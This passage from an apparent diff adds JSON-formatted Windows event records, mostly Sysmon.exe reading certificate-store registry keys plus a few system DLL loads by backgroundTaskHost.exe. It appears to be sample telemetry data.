+ "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "biwinrt.dll", + "image_path": "C:\\Windows\\System32\\biwinrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690270000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ContentDeliveryManager.Background.dll", + "image_path": "C:\\Windows\\SystemApps\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\ContentDeliveryManager.Background.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + 
"process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690580000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + 